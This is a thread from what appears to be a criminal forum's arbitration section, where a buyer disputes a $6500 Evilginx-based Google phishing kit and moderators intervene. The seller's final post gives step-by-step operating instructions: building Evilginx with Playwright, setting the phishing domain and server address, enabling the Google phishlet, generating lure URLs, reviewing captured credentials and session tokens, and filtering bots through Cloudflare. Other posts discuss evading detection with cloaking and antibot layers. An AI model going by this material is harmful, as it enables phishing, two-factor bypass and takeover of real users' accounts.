Блек blackdatabase - 6500$

Пожалуйста, обратите внимание, что пользователь заблокирован
Ты называешь меня идиотом и всячески оскорбляешь с самого начала нашего общения, хотя за эти деньги ты должен был приехать ко мне и отсосать мне член,не говоря уже о качественной поддержке, понимаешь? Твоя проблема, что клиент не может нормально работать с твоим продуктом. Потому что это консольное дерьмо. Ты даже не умудрился прикрутить веб морду к своей сырости. Да инструкцию хотябы написать нормальную. Но окей с парой моментов мы с горем пополам разобрались, но по итогу это все было зря, потому что ДАЖЕ ТВОЙ ФИШ, КОТОРЫЙ ТЫ УТВЕРЖДАЛ ЧТО РАБОТАЕТ, не работает и также зависает))) Когда ты проверял мой фиш, у тебя также все зависало, потом ты соврал, что мол все ок, но по итогу признался что до пароля ты не дошел и он все равно виснет) А далее ты взял уже свой демонстрационный фиш и ввел там почту, тебя кинуло на 2фа, но до пароля ты не дошел, ибо ты знаешь что он будет виснуть, я тебя просил несколько раз ввести пароль но ты же в курсе, что ты этого не сможешь сделать) Все видно по логам переписки...
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Он постоянно кричит что у него "более чем 200 текущих клиентов" хотя в темах есть пару отзывов, и то скорее всего от его корешей, как-то слабовато для 200+ покупателей... В основном в его же теме его тыкают носом в: невозможность работы без клоаки/бессмысленность предложения, потому что оно так не работает/завышенные цены/паблик фиши,которые и так есть в общем доступе
 
Так же приобретали фишлет, полностью сырой, минимально модифицированный и весь в алертах, в итоге так же повыебывался какой он мега кодер и послал, в итоге пришлось модифицировать своими силами и доводить все до ума, цена этому изделию 500$ макс в базарный день.

За эти деньги качество ОБЯЗАНО быть безупречным!!!
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Так же приобретали фишлет, полностью сырой, минимально модифицированный и весь в алертах, в итоге так же повыебывался какой он мега кодер и послал, в итоге пришлось модифицировать своими силами и доводить все до ума, цена этому изделию 500$ макс в базарный день.
Да, при чем алерты моментальные вылетают, да, как только домен встал? Чисто уже по коду или яра правилам, не знаю как правильно... Тут без кло я хз как работать на паблик коде...
 
Да, при чем алерты моментальные вылетают, да, как только домен встал? Чисто уже по коду или яра правилам, не знаю как правильно... Тут без кло я хз как работать на паблик коде...
Моментальный алерт, потому, что даже код не шифрован, любой бот, даже с тг приведет за собой кучу остальным и привет, поэтому первым делом связали данное ИЗДЕЛИЕ с антиботом, потом модифицировали код и впоследствии сам евил, не говоря уже о том, что дурень сделал вход во все акки с 1го сокса, это вообще атас...
 
Почитал. Я полностью согласен с заявителем. blackdatabase, это ненормально, что вы клиента за его же деньги обзываете идиотом. При чем, делаете это после получения денег, а не до. Человек может быть из другой сферы, например, из сферы доступов и не знать определенных деталей. Никто не заставляет вас учить клиентов, вы продаете продукт, а не услуги обучения, это не входит в ваши обязательства. Но:
1. Вы должны показать, объяснить, написать инструкцию. Это дефолтное правило, его придерживаются даже белые кодеры на гитхабе, добавляя короткий ридми с описанием, инсталлом, запуском. Человек, даже будучи хорошим кодером, может не знать нюансов именно вашего продукта и ему лень (и нет надобности) лезть в чужие исходники.
2. Ваш продукт должен быть полностью рабочим. За такие деньги это должна быть нормальная stable версия, а не бета.

blackdatabase, прошу в течении 24 часов:
1. предоставить истцу полные инструкции (описание, запуск и т.д.)
2. предоставить видео с демонстрацией запуска и работоспособности
3. прекратить оскорблять клиентов, это ненормально и не клиентоориентированно.

I read it. I completely agree with the applicant. blackdatabase, it is not normal that you call a client an idiot for his own money, insult him. Moreover, you do it after receiving the money, not before. The person may be from another field, for example, from the access field, and not know certain details. No one forces you to teach clients, you sell a product, not training services, this is not part of your obligations. But:
1. You must show, explain, write instructions. This is the default rule, even whitehat coders on GitHub adhere to it, add a short readme with a description, installation, launch. A person, even being a good coder, may not know the nuances of your product and he is too lazy (and there is no need) to open someone else's source code.
2. Your product must be fully functional. For that kind of money, it should be a normal stable version, not a beta.

blackdatabase, I ask within 24 hours:
1. provide the somniya with full instructions (description, launch, etc.)
2. provide a video demonstrating the launch and functionality
3. stop insulting customers, this is abnormal and not customer-oriented.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
blackdatabase, I ask within 24 hours:
1. provide the somniya with full instructions (description, launch, etc.)
2. provide a video demonstrating the launch and functionality
3. stop insulting customers, this is abnormal and not customer-oriented.
Alright, I will make new videos, as I have already sent a video.

2. Your product must be fully functional. For that kind of money, it should be a normal stable version, not a beta.
It is , one more time , u can came and test . or give the contact to customers use this .
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Почитал. Я полностью согласен с заявителем. blackdatabase, это ненормально, что вы клиента за его же деньги обзываете идиотом. При чем, делаете это после получения денег, а не до. Человек может быть из другой сферы, например, из сферы доступов и не знать определенных деталей. Никто не заставляет вас учить клиентов, вы продаете продукт, а не услуги обучения, это не входит в ваши обязательства. Но:
1. Вы должны показать, объяснить, написать инструкцию. Это дефолтное правило, его придерживаются даже белые кодеры на гитхабе, добавляя короткий ридми с описанием, инсталлом, запуском. Человек, даже будучи хорошим кодером, может не знать нюансов именно вашего продукта и ему лень (и нет надобности) лезть в чужие исходники.
2. Ваш продукт должен быть полностью рабочим. За такие деньги это должна быть нормальная stable версия, а не бета.

blackdatabase, прошу в течении 24 часов:
1. предоставить истцу полные инструкции (описание, запуск и т.д.)
2. предоставить видео с демонстрацией запуска и работоспособности
3. прекратить оскорблять клиентов, это ненормально и не клиентоориентированно.

Я прочитал. Полностью согласен с заявителем. blackdatabase, это не нормально, что вы называете клиента идиотом за его же деньги, оскорбляете его. Тем более, вы делаете это после получения денег, а не до. Человек может быть из другой сферы, например из сферы доступа, и не знать определенных деталей. Вас никто не заставляет обучать клиентов, вы продаете продукт, а не услуги по обучению, это не входит в ваши обязательства. Но:
1. Вы должны показать, объяснить, написать инструкцию. Это правило по умолчанию, его придерживаются даже whitehat-кодеры на GitHub, добавляют краткий readme с описанием, установкой, запуском. Человек, даже будучи хорошим кодером, может не знать тонкостей вашего продукта и ему лень (да и незачем) открывать чужой исходный код.
2. Ваш продукт должен быть полностью функциональным. За такие деньги это должна быть нормальная стабильная версия, а не бета.

blackdatabase, прошу в течение 24 часов:
1. предоставить somniya полные инструкции (описание, запуск и т. д.)
2. предоставить видео, демонстрирующее запуск и функциональность
3. прекратите оскорблять клиентов, это ненормально и неклиентоориентированно.
Уважаемый арбитр, меня не интересуют фиксы. Меня интересует манибек. Я уже неделю бился с продавцом, и все равно ничего нормально не работает. Как я могу с ним нормально общаться и взаимодейтсвовать по продукту после стольких оскорблений и язв в мою сторону?. Я настаиваю, нет требую полный манибек. Это дно, а не продукт. Я не собираюсь с ним больше взаимодействовать.
 
I read it. I completely agree with the applicant. blackdatabase, it is not normal that you call a client an idiot for his own money. Moreover, you do this after receiving the money, not before. The person may be from another field, for example, from the access field and not know certain details. No one forces you to teach clients, you sell a product, not training services, this is not part of your obligations. But:
1. You must show, explain, write instructions. This is a default rule, even white coders on GitHub adhere to it, adding a short readme with a description, installation, launch. A person, even being a good coder, may not know the nuances of your product and he is too lazy (and there is no need) to get into someone else's source code.
2. Your product must be fully functional. For that kind of money, it should be a normal stable version, not a beta.

blackdatabase, please within 24 hours:
1. provide the plaintiff with full instructions (description, launch, etc.)
2. Provide a video demonstrating the launch and functionality
3. Stop insulting customers, it is not normal and not customer-oriented.

I read it. I completely agree with the applicant. blackdatabase, it is not normal that you call a client an idiot for his own money, insult him. Moreover, you do it after receiving the money, not before. The person may be from another field, for example, from the access field, and not know certain details. No one forces you to teach clients, you sell a product, not training services, this is not part of your obligations. But:
1. You must show, explain, write instructions. This is the default rule, even whitehat coders on GitHub adhere to it, add a short readme with a description, installation, launch. A person, even being a good coder, may not know the nuances of your product and he is too lazy (and there is no need) to open someone else's source code.
2. Your product must be fully functional. For that kind of money, it should be a normal stable version, not a beta.

blackdatabase, I ask within 24 hours:
1. provide the somniya with full instructions (description, launch, etc.)
2. provide a video demonstrating the launch and functionality
3. stop insulting customers, this is abnormal and not customer-oriented.
wonderful reply.

i would appraise you for this

most of the phishlet code is available via a normal google search. github & pastebin links you'll find easily for almost 85% of the code

i got it from which the applicant of the complait uploaded here.

as far as i know consider this is nothing but a 100% pure scam
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Почитал. Я полностью согласен с заявителем. blackdatabase, это ненормально, что вы клиента за его же деньги обзываете идиотом. При чем, делаете это после получения денег, а не до. Человек может быть из другой сферы, например, из сферы доступов и не знать определенных деталей. Никто не заставляет вас учить клиентов, вы продаете продукт, а не услуги обучения, это не входит в ваши обязательства. Но:
1. Вы должны показать, объяснить, написать инструкцию. Это дефолтное правило, его придерживаются даже белые кодеры на гитхабе, добавляя короткий ридми с описанием, инсталлом, запуском. Человек, даже будучи хорошим кодером, может не знать нюансов именно вашего продукта и ему лень (и нет надобности) лезть в чужие исходники.
2. Ваш продукт должен быть полностью рабочим. За такие деньги это должна быть нормальная stable версия, а не бета.

blackdatabase, прошу в течении 24 часов:
1. предоставить истцу полные инструкции (описание, запуск и т.д.)
2. предоставить видео с демонстрацией запуска и работоспособности
3. прекратить оскорблять клиентов, это ненормально и не клиентоориентированно.

Я прочитал. Полностью согласен с заявителем. blackdatabase, это не нормально, что вы называете клиента идиотом за его же деньги, оскорбляете его. Тем более, вы делаете это после получения денег, а не до. Человек может быть из другой сферы, например из сферы доступа, и не знать определенных деталей. Вас никто не заставляет обучать клиентов, вы продаете продукт, а не услуги по обучению, это не входит в ваши обязательства. Но:
1. Вы должны показать, объяснить, написать инструкцию. Это правило по умолчанию, его придерживаются даже whitehat-кодеры на GitHub, добавляют краткий readme с описанием, установкой, запуском. Человек, даже будучи хорошим кодером, может не знать тонкостей вашего продукта и ему лень (да и незачем) открывать чужой исходный код.
2. Ваш продукт должен быть полностью функциональным. За такие деньги это должна быть нормальная стабильная версия, а не бета.

blackdatabase, прошу в течение 24 часов:
1. предоставить somniya полные инструкции (описание, запуск и т. д.)
2. предоставить видео, демонстрирующее запуск и функциональность
3. прекратите оскорблять клиентов, это ненормально и неклиентоориентированно.
К тому же мы оба видим отзывы людей о нем, как минимум двое пострадавших,один из них недавно выиграл арбитраж. Второй (не подтверждено) также покупал продукт и он оказался полностью непригодным

admin Еще раз повторюсь, меня не интересуют фиксы, я не собираюсь с ним дальше общаться, я себя уважаю. Меня интересует только и только манибе. Мне абсолютно не интересен более этот человек и его продукт,который лежит в открытом доступе. В том виде, в котором есть у меня сурсы, они не рабочие, от них толку нет.По сути я получил пустышку. К тому же он меня сразу же заблокировал и удалил переписку. Только манибек.
 
Уважаемый арбитр, меня не интересуют фиксы. Меня интересует манибек. Я уже неделю бился с продавцом, и все равно ничего нормально не работает. Как я могу с ним нормально общаться и взаимодейтсвовать по продукту после стольких оскорблений и язв в мою сторону?. Я настаиваю, нет требую полный манибек. Это дно, а не продукт. Я не собираюсь с ним больше взаимодействовать.
Вы купили сорец, а не лицензию. В такого рода продуктах манибек по щучьему велению невозможен. Продавец не может аннулировать вашу лицуху, удалить ваш сервак и выйти без потерь из сделки. А иначе мы создаем прецедент и таких блеков (и реальных, и фейковых) завтра будет сотня. Каждый покупатель захочет деньги назад. Оскорбления - это неприятно, селлер уже получил за это жесткий варн, но мы здесь занимаемся не эмоциональными, а техническими вещами.
Пусть сначала продавец все подготовит, вы проверьте. Мы все вместе тут чекнем. А дальше, по результату, посмотрим.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
admin
Он продает ПАБЛИК, еще раз повторюсь. В том виде,в котором он передал мне сурсы, они доступны БЕСПЛАТНО, они нерабочие, толку от них ровно 0, только манибек
 
который лежит в открытом доступе.
admin
Он продает ПАБЛИК, еще раз повторюсь. В том виде,в котором он передал мне сурсы, они доступны БЕСПЛАТНО, они нерабочие, толку от них ровно 0, только манибек
Если вам продали паблик, прошу здесь пруфы.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
I sell phishing pages for vulnerability testing, based on the Evilginx project: 'https://help.evilginx.com/docs/intro'. This is why requests for help (on how to use it) are absurd, as the site 'https://help.evilginx.com/docs/intro' already provides information on usage. This developer offers two versions: a public version (available on GitHub) https://github.com/kgretzky/evilginx2, and Evilginx Pro: 'https://evilginx.com/' — the latter is licensed with a subscription via cloud, available only to individuals conducting legal penetration testing and vulnerability assessments of online platforms. So, certainly not for your purposes.

For you, there are sellers like myself, who, in cases like Gmail, where the Evilginx author uses a module based on Puppeteer.js to avoid Google detection, provide a similar structure — essentially a modified version of Evilginx that isn’t flagged (with headers set, as the public version includes these techniques and cross-browser fixes), capable of performing reverse proxying for desired platforms."
The version I sell for Google is similar to '
,' posted by 'Kuba Gretzky' on his X.com channel. The only difference is that I use Playwright instead of Puppeteer.js, as the author does. I chose Playwright because it has a Go library. Therefore, not only am I not selling a public version, but my version is also unique in its approach.

You’ll find many sellers offering versions that don’t use Puppeteer or Chromium modules and appear to be public versions of these phishlets. In these cases, let’s list the issues. As you can see from our friend’s example at '
,' Gmail often detects the browser as incompatible, meaning these versions that use only reverse proxy work for only a small percentage of users (primarily those who have never had a Google Play account and are not business accounts).

The public version of Evilginx (available on GitHub) https://github.com/kgretzky/evilginx2 does not have a module to handle reCaptcha, so if you encounter a reCaptcha challenge, it will not work. The main issue here is that most business accounts will require this after entering the email.
 
blackdatabase,
Bro, have you ever thought that it's your client and that you should support him yourself and you yourself should find compromises with him but not us?
Why do you post all of this shit in complaint? admin wanted from you to communicate and to explain things to your customer, to make peace with him that he could achieve his business goals with your service.

I promise to you that despite the results how this complaint would end - you will need to make a good deposit if you want to continue your service on our forum.
We are not interested to lose our reputation because of a seller who will do a business in r1z style.
 
blackdatabase,
Bro, have you ever thought that it's your client and that you should support him yourself and you yourself should find compromises with him but not us?
Why do you post all of this shit in complaint? admin wanted from you to communicate and to explain things to your customer, to make peace with him that he could achieve his business goals with your service.

I promise to you that despite the results how this complaint would end - you will need to make a good deposit if you want to continue your service on our forum.
We are not interested to lose our reputation because of a seller who will do a business in r1z style.
huge respect to you for this :)

bratva thanku for this :)
 
Клиент получил исходный код.
Клиент получил видео по установке.
Клиент получил видео по настройке.
Клиент получил текстовую инструкцию, размещенную мною выше, для использования.
Я установил сервер.
Я настроил то, что он не знал.

Можешь посоветовать, что предложить клиенту? Я просто не знаю. Ты хочешь, чтобы я переделал то, что уже дал, но в другой форме? Или ты хочешь, чтобы я сделал еще одну установку в реальном времени? Я не понимаю, что именно мне нужно сделать. Думаю снова записать все с нуля и выложить здесь. Поэтому я начал объяснять и про проданное приложение, потому что заметил, что есть люди, которые предъявляют обвинения. Если ты будешь так добр и дашь мне совет по этой проблеме, это было бы полезно.
I do not know what is your mother tongue but I will continue in english because it's definitely not russian.

Again: it's your client, you sold your service to him and he has a right to get this service. And you should deliver it. The way you are communicating with him in this complaint (and with your other clients) is not acceptable because it leaves an impression that you are doing a favor just to answer to all of us. In real life we have courts and we also have laws that protect customers in their consumer rights. Here we have only arbitrage and often (if nobody was scammed) only a common sense.

So again I will try to appeal to your common sense: your arguments here do you no good. It's just a promotion that you can't provide an adequate support of your service that is over-priced. Please contact your client and make him satisfied with your service without any debate why you can't do that.

And I didn't say that your account will be closed, I'm just talking about deposit that should be (again) adequate to a fee that you normally charge your clients for :) I'm moderator, dude, and this is in my power. To ask an adequate deposit from you. All my other advise is just a reaction of community member, please excuse me for it (I'm not a robot).
 
I do not know what is your mother tongue but I will continue in english because it's definitely not russian.

Again: it's your client, you sold your service to him and he has a right to get this service. And you should deliver it. The way you are communicating with him in this complaint (and with your other clients) is not acceptable because it leaves an impression that you are doing a favor just to answer to all of us. In real life we have courts and we also have laws that protect customers in their consumer rights. Here we have only arbitrage and often (if nobody was scammed) only a common sense.

So again I will try to appeal to your common sense: your arguments here do you no good. It's just a promotion that you can't provide an adequate support of your service that is over-priced. Please contact your client and make him satisfied with your service without any debate why you can't do that.

And I didn't say that your account will be closed, I'm just talking about deposit that should be (again) adequate to a fee that you normally charge your clients for :) I'm moderator, dude, and this is in my power. To ask an adequate deposit from you. All my other advise is just a reaction of community member, please excuse me for it (I'm not a robot).
I agree with this. In my case he took the arbitrage like ofense and for a justification to keep me waiting. He acts like he is doing a favor not scamming you, and plays with your money and your time. The phishlet he sells is very expensive and needs a lot of trust to a customer to invest in a tool like this, and when you see his language and attitude it makes you think you loose your money for good.
I get the money back but all the people have to read the logs of my conversation with him (he blocked me) and recently deleted all the conversation. The main point was he THREAT me to dont make arbitragge because will delay all the negotiatons minimun 6 weeks more. And when he told me he will give my money back, He always have a excuse. He tried to deliver a product dont optimized. Not half as good that the phishlet he advertises.
i dont know in this particuraly case, but he for sure take down the reputation of this forum acting like that. Anybody that sees my arbitrage will have serious doubt to make buisness with this man. He will have to correct his behavior.

S
The idea is this: I am not selling a service; I am selling a modified Evilginx and a source code, not a service. I agree that support is necessary, but I don't know what more I can offer. Please, tell me.

I provided an installation video, plus I did an installation myself.
I provided a setup video for a simple Telegram bot.
I provided a video for setting up Cloudflare.
I provided usage instructions, and there are also public instructions here: 'https://help.evilginx.com/docs/intro.'

So, I have given instructions as well.
So why you dont put it in your article like pre-requisite to know all that? When you want to receive the money you are like a cute puppy. When you already have the money you behave like you are too good and smart for the rest of us...

Thay says a lot.
 
Пожалуйста, обратите внимание, что пользователь заблокирован

Installation Steps​

  1. Update Package Lists​

    Begin by updating your system’s package lists to ensure you have the latest information on the newest versions of packages and their dependencies.
    sudo apt-get update
  2. Install xrandr​

    xrandr is a utility for managing screen resolutions and display settings.
    -- Use this option if you want to run Playwright with Xserver (for example, in MobaXterm) so you can view the browser live.
    -- If use "Headless: playwright.Bool(true)," do no need this to install.

    sudo apt-get install x11-xserver-utils
  3. Install Google Chrome
    -- Use Chrome only if you choose not to use the browsers included in the Playwright app. In the source you received, you don’t need these installations.

    Download and install the latest stable version of Google Chrome.
    Код:
    wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
    sudo dpkg -i google-chrome-stable_current_amd64.deb
    sudo apt-get install -f # Install any missing dependencies
  4. Install Go Programming Language
    -- You will need to install the Go language, as the source code is in Go, and to compile it in Linux, you need Go installed.

    Go is essential for running Playwright-Go.
    Код:
    wget https://golang.org/dl/go1.20.7.linux-amd64.tar.gz
    sudo rm -rf /usr/local/go
    sudo tar -C /usr/local -xzf go1.20.7.linux-amd64.tar.gz
    export PATH=$PATH:/usr/local/go/bin
    go version
  5. Install Playwright-Go and Dependencies
    -- You need to install the Playwright Go library, as the Evilginx version for Google uses a module called EvilPlaywright. This module controls a real browser behind the reverse proxy to obtain certain tokens that otherwise cannot be retrieved correctly due to the different host in the reverse proxy or due to Google detecting browser incompatibilities with video versions, fonts, etc.

    Set up Playwright-Go, which is required for browser automation.
    Код:
    go get -u github.com/playwright-community/playwright-go
    go run github.com/playwright-community/playwright-go/cmd/playwright@latest install --with-deps
    go install github.com/playwright-community/playwright-go/cmd/playwright@latest
    playwright install --with-dep




  6. Starting Evilginx2​

    To launch Evilginx2, execute the following command:

    sudo /root/evilginx2/build/evilginx -p /root/evilginx2/phishlets -developer

    [COLOR=rgb(250, 197, 28)]sudo [/COLOR] Runs the command with superuser (root) privileges, which are often necessary for network-related applications or services.
    /root/evilginx2/build/evilginx This is the path to the compiled Evilginx2 binary. Evilginx2 is a tool often used in phishing simulations or security testing to capture authentication tokens in real-time by acting as a reverse proxy.
    -p /root/evilginx2/phishlets Specifies the path where the phishlets are located. Phishlets are configuration files that define the behavior of Evilginx2 for specific websites or services (e.g., Google, Facebook). These phishlets contain rules for forwarding requests and capturing tokens and cookies.
    -developer: This allows for developer mode It does not use SSL from Evilginx with auto ssl using Let's Encrypt; instead, it will use the SSL settings provided by Cloudflare.
  7. STOP Evilginx2
    If Evilginx was started directly in the terminal:
    Press q in the terminal window where Evilginx is running. This will terminate the program.

  8. Adding a New Domain and Creating Lures
    Configure Your Domain:
    config domain your-domain.com
    Set Your Server's IPv4 Address:
    config ipv4 103.114.163.58
    Create and Enable a Phishlet:
    phishlets hostname google your-domain.com
    phishlets enable google
    Create a New Lure:
    lures create google
    Retrieve the Lure URL:
    lures get-url # Retrieves the current lure's URL

Advanced Configuration Note: all these commands are within the application, meaning they should be entered after the application has started and in the same window. Do not try the commands if you are not inside Evilginx.

1. Configuration Commands​

Manage and customize your Evilginx2 settings using the config command.
  • Display All Configuration Variables:
    config
  • Set Base Domain:
    config domain <domain>
    Example: config domain evilsite.com
  • Set External IPv4 Address:
    config ipv4 <ipv4_address>
    Example: zconfig ipv4 103.114.163.58
  • Set Binding IPv4 Address:
    config ipv4 bind <ipv4_address>
  • Change Unauthorized Redirect URL:
    config unauth_url <url>

2. Phishlets Management​

Phishlets are templates used to create phishing scenarios. Manage them with the phishlets command.
  • Status of All Phishlets:
    phishlets
  • View Details of a Specific Phishlet:
    phishlets <phishlet>
  • Create a New Phishlet:
    phishlets create <phishlet> <child_name> <key1=value1> <key2=value2>
  • Delete a Phishlet:
    phishlets delete <phishlet>
  • Set Hostname for a Phishlet:
    phishlets hostname <phishlet> <hostname>
    Example: phishlets hostname google evilsite.com
  • Override Unauthorized URL for a Phishlet:
    phishlets unauth_url <phishlet> <url>
  • Enable a Phishlet:
    phishlets enable <phishlet>
  • Disable a Phishlet:
    phishlets disable <phishlet>
  • Hide a Phishlet:
    phishlets hide <phishlet>
  • Unhide a Phishlet:
    phishlets unhide <phishlet>
  • Generate Hosts File Entries for Testing:
    phishlets get-hosts <phishlet>

3. Lures Management​

Lures are specific phishing links created from phishlets. Manage them using the lures command.
  • All Created Lures:
  • lures
  • View Details of a Specific Lure:
  • lures <id>
  • Create a New Lure:
  • lures create <phishlet>
  • Delete a Specific Lure:
    lures delete <id>
  • Delete All Lures:
  • lures delete all
  • Generate a Phishing URL for a Lure:
  • lures get-url <id> <key1=value1> <key2=value2>
  • Generate Multiple Phishing URLs with Parameters:
    lures get-url <id> import <params_file> export <urls_file> <text|csv|json>
  • Edit Lure Hostname:
  • lures edit <id> hostname <hostname>
  • Edit Lure Path:
  • lures edit <id> path <path>
  • Set HTML Redirector Directory for a Lure:
  • lures edit <id> redirector <path>
  • Set User-Agent Filter for a Lure:
  • lures edit <id> ua_filter <regexp>
  • Set Redirect URL After Successful Authorization:
  • lures edit <id> redirect_url <redirect_url>

4. Sessions Management​

Manage captured credentials and authentication tokens using the sessions command. -- In other words, here you can see the logs you’ve captured, as well as the traffic. The empty entries are just accesses.
  • History of All Logged Visits and Captured Credentials:
    sessions
  • View Details of a Specific Session:
    sessions <id>
  • Delete a Specific Session:
    sessions delete <id>
  • Delete Multiple Sessions:
    sessions delete <id_range>
    Example: sessions delete 1-7,10-12,15-25
  • Delete All Sessions:
    sessions delete all

5. Proxy Configuration​

Configure a proxy to route connections to remote websites using the proxy command.
  • All Proxy Configuration Variables:
    proxy
  • Enable Proxy:
    proxy enable
  • Disable Proxy:
    proxy disable
  • Set Proxy Type (Options: http, https, socks5, socks5h):
    proxy type <type>
    Example: proxy type socks5
  • Set Proxy Address:
    proxy address <address>
  • Set Proxy Port:
    proxy port <port>
  • Set Proxy Username (for Authentication):
    proxy username <username>
  • Set Proxy Password (for Authentication):
    proxy password <password>

6. Blacklist Configuration​

Manage IP address blacklisting based on request types using the blacklist command.
  • Current Blacklisting Mode:
    blacklist
  • Blacklist All IP Addresses for Every Request:
    blacklist all
  • Blacklist IP Addresses Only for Unauthorized Requests:
    blacklist unauth
  • Blacklist IP Addresses Without Adding to the Blacklist:
    blacklist noadd
  • Disable Blacklisting (Allow All Requests):
    blacklist off
  • Enable or Disable Logging for Blacklist Messages:
    blacklist log <on|off>
    Example: blacklist log on

Notes​

Running Evilginx2​

To start Evilginx2 with developer privileges and specify the phishlets directory, use the following command:
sudo /root/evilginx2/build/evilginx -p /root/evilginx2/phishlets -developer

Customization​

Replace placeholders like <domain>, <phishlet>, <id>, <hostname>, <path>, <redirect_url>, <image_url>, <url>, <port>, <username>, <password>, etc., with your specific values as needed.

Security Considerations​

Ensure that all configurations comply with legal and ethical standards. Use responsibly and only for authorized security testing purposes.

Help Commands​

For additional assistance with any command, you can typically use:
help <command>
Example: help phishlets
Setup telegram bot:

Configuring the Cloudflare account to filter bots and sort traffic by country.




EN: Please be careful when writing my name on Telegram. Many scammers create profiles similar to mine by altering letters in the username. My only official Telegram profile is ** https://t.me/blackdatabase **. Always double-check the spelling: **@ B L A C K D A T A B A S E**. If the spelling differs, it's not me. Stay vigilant to avoid fraud, and if unsure, confirm before proceeding with any transactions.

---

RU: Будьте внимательны при написании моего имени в Telegram. Многие мошенники создают профили, похожие на мой, изменяя буквы в имени пользователя. Мой единственный официальный профиль в Telegram - ** https://t.me/blackdatabase **. Всегда проверяйте правильность написания: ** @ B L A C K D A T A B A S E**. Если написание отличается, это не я. Будьте бдительны, чтобы не стать жертвой мошенничества. Если сомневаетесь, подтвердите перед любой сделкой.
 


Напишите ответ...
Верх